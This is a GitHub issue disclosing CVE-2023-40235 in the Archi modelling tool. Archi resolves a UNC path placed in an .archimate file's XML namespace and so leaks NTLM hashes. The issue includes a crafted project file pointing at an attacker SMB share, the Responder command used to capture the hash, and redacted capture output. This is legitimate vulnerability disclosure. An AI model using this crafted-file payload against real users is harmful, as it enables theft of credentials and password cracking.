CVE-2023-40235: NTLM Hash Disclosure (v5.0.2) · Issue #946 · archimatetool/archi

Version of Archi

5.0.2

Description

When parsing the XMLNS value of an archimate project file, if the namespace does not match the expected archimate URL, the parser will access the provided resource. If the provided resource is a UNC path pointing to a share server that does not accept guest account, the host will try to authenticate on the share using the current user’s session.

Impact

A malicious user can capture NTLM hash of the authenticated user running the application. With the captured hashes, offline password cracking can be performed in order to guess the password and gain unauthorized access to the server.

Technical fix

Do not allow the application’s functionality to resolve or load UNC paths.

Technical Details

“archimate” project are saved as XML file using the extension .archimate . The below example is an archimate project with a single BusinessActor element (John Doe) present in the “Business” folder. That element is place on the diagram “Default View” (link by the ID
e79145c…).

<?xml version="1.0" encoding="UTF-8"?>
<archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:archimate="http://www.archimatetool.com/archimate" name="(new model)" id="id-81d2dc112d96489ea22c7f336df894cd" version="5.0.0">
  <folder name="Strategy" id="id-2ab87f8808194aafb76570f1480511a1" type="strategy"/>
  <folder name="Business" id="id-2e5d95fb12be42589b1e494dfc79dd2a" type="business">
    <element xsi:type="archimate:BusinessActor" name="John Doe" id="id-e79145cce35a4704a19ba22885cfc9d2"/>
  </folder>
  <folder name="Application" id="id-53a1acc2e38c4d7db125ccd25dc6892d" type="application"/>
  <folder name="Technology &amp; Physical" id="id-24c7dc79bf11478ea65391ef16835543" type="technology"/>
  <folder name="Motivation" id="id-dc391a764cd141d389af3b3b4a81a94a" type="motivation"/>
  <folder name="Implementation &amp; Migration" id="id-90400d4328f448779016a63ad6eab713" type="implementation_migration"/>
  <folder name="Other" id="id-276cb2473edf4874a5854257ed930166" type="other"/>
  <folder name="Relations" id="id-8a1f3df198fa44c7b271f846e4fa1d12" type="relations"/>
  <folder name="Views" id="id-bdcce9aa0bb64f4386ebc4ef4a90fa1b" type="diagrams">
    <element xsi:type="archimate:ArchimateDiagramModel" name="Default View" id="id-fb6015c3baa2446d90238f15a70a5adb">
      <child xsi:type="archimate:DiagramObject" id="id-be3e6f080b904e2496cf1d89f8965c15" archimateElement="id-e79145cce35a4704a19ba22885cfc9d2">
        <bounds x="571" y="332" width="120" height="55"/>
      </child>
    </element>
  </folder>
</archimate:model>

The xmlns:archimate is pointing to http://www.archimatetool.com/archimate. However, if the value is modified, the parser will try to access the resource, and in case a UNC is provided, the host will try to access the share drive and if need be, try to authenticate.

In the following example, the attacker is running the Responder tool ( Responder.py) listening on the interface 172.16.227.1. The archimate project file is modified so that the xmlns:archimate is pointing to \172.16.227.1\share\archimate.

<?xml version="1.0" encoding="UTF-8"?>
<archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:archimate="\\172.16.227.1\share\archimate" name="(new model)" id="id-81d2dc112d96489ea22c7f336df894cd" version="5.0.0">
[...]

Whenever the victim is opening the modified file, the application will try to access the resource via the host and authenticate on the fake SMB share created by Responder.py.

sudo ./Responder.py -I vmnet8
[...]
[+] Listening for events...
[...]
[SMB] NTLMv2-SSP Client: 172.16.227.169
[SMB] NTLMv2-SSP Username : LAB\tester
[SMB] NTLMv2-SSP Hash:
test::LAB:xxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxx[...]

As seen in the output above, the NTLM hash is leaked and could be used to crack the user’s password.